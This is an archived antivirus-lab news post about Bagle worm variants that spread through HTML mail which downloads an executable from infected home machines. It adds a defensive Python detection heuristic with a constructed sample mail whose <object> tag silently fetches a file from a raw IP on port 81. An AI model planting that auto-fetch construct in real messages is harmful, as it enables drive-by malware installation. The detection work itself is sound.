NEWS FROM THE LAB - Thursday, March 18, 2004

A massmailer which doesn't mail itself Posted by Mikko @ 09:07 GMT

These new Bagles (by the way, one more variant was just found, named Bagle.S) are using a new technique to spread. They do not send themselves as email attachments, as you would expect. Instead, they send emails which contain an HTML exploit.

When the message is read, this HTML code causes the recipient's machine to download and run an executable from a web server: a web server installed on home machines infected by one of the previous Bagles. The worms carry lists of hundreds of IP addresses of machines running such a web server.

Most firewall programs would block inbound connections to such a web server on a workstation (Windows XP's built-in firewall does so, if it is turned on). But the party behind Bagle seems to be using only machines that are not behind such a firewall.

Because the HTML exploit runs automatically (on unpatched systems) when the email is rendered, users do not have to double-click anything to get infected: reading or previewing the email is enough.
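The detection side of the technique described above, as an added example that is not part of the original post and not F-Secure's code: a gateway-side heuristic that flags HTML mail bodies which make the client auto-fetch a remote resource (object, iframe, script and similar tags) from a literal IP address, a non-standard port, or a path ending in an executable extension, instead of carrying an attachment. The two sample messages, the `<object>` construct and the 198.51.100.23 address are constructed for illustration; the post does not say which HTML exploit these Bagle variants use, so the tag list and thresholds are assumptions, not a signature.

```python
"""Heuristic for mails that carry an HTML downloader instead of an attachment.

Added example; the sample messages below are constructed, not real Bagle mails.
"""
import email
import re
from email import policy
from ipaddress import ip_address
from urllib.parse import urlparse

# Tags whose referenced resource a mail client fetches without any click
# (assumption: an <a href> needs user action, so it is not counted).
AUTO_FETCH_TAGS = ("object", "iframe", "embed", "script", "frame", "applet")
URL_ATTRS = ("src", "data", "codebase")
EXEC_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".hta")

TAG_RE = re.compile(r"<\s*([a-zA-Z]+)\b([^>]*)>", re.S)
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*("([^"]*)"|\'([^\']*)\'|([^\s>]+))')

# Constructed sample: a mail whose HTML part pulls a file from a raw IP on port 81.
SAMPLE_MAIL = b"""\
From: sender@example.com
To: victim@example.org
Subject: Hi
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Please see the attachment.
--b1
Content-Type: text/html; charset="us-ascii"

<html><body>
<p>Please see the attachment.</p>
<a href="http://www.example.com/news.html">news</a>
<object data="http://198.51.100.23:81/index.php" width="0" height="0"></object>
</body></html>
--b1--
"""

# Constructed sample: ordinary HTML newsletter with a hostname-based image.
BENIGN_MAIL = b"""\
From: newsletter@example.com
To: victim@example.org
Subject: Weekly
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body><p>Hi</p><img src="http://www.example.com/logo.png"></body></html>
"""


def html_parts(raw):
    """Return the decoded text of every text/html part in a raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return [p.get_content() for p in msg.walk() if p.get_content_type() == "text/html"]


def is_literal_ip(host):
    """True when the URL host is a bare IPv4/IPv6 address rather than a name."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_urls(html):
    """List every auto-fetched URL in the HTML with the reasons it looks like a downloader."""
    findings = []
    for m in TAG_RE.finditer(html):
        tag = m.group(1).lower()
        if tag not in AUTO_FETCH_TAGS:
            continue
        for a in ATTR_RE.finditer(m.group(2)):
            if a.group(1).lower() not in URL_ATTRS:
                continue
            url = a.group(3) or a.group(4) or a.group(5) or ""
            parsed = urlparse(url)
            if parsed.scheme not in ("http", "https", "ftp"):
                continue
            try:
                port = parsed.port
            except ValueError:  # malformed port string
                port = None
            reasons = []
            if is_literal_ip(parsed.hostname or ""):
                reasons.append("literal IP host")
            if port not in (None, 80, 443):
                reasons.append("non-standard port %d" % port)
            if parsed.path.lower().endswith(EXEC_EXTENSIONS):
                reasons.append("executable path")
            findings.append({"tag": tag, "url": url, "reasons": reasons})
    return findings


def classify_mail(raw):
    """Return the auto-fetch findings that have at least one reason; empty list means clean."""
    hits = []
    for html in html_parts(raw):
        hits.extend(f for f in suspicious_urls(html) if f["reasons"])
    return hits


if __name__ == "__main__":
    for name, raw in (("sample", SAMPLE_MAIL), ("benign", BENIGN_MAIL)):
        print(name, classify_mail(raw))
```

A hit on a literal IP host plus a non-standard port is exactly the shape the post describes (home machines, no DNS name, a worm-installed web server), which is why both are scored separately: either alone produces false positives on intranet mail, and the combination is what merits quarantining the message or at least stripping the HTML part.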

Fetching the payload from a website instead of attaching it is not an entirely new technique: an email worm called Fagled already did this in 2002. For more information, see https://www.f-secure.com/v-descs/fagled.shtml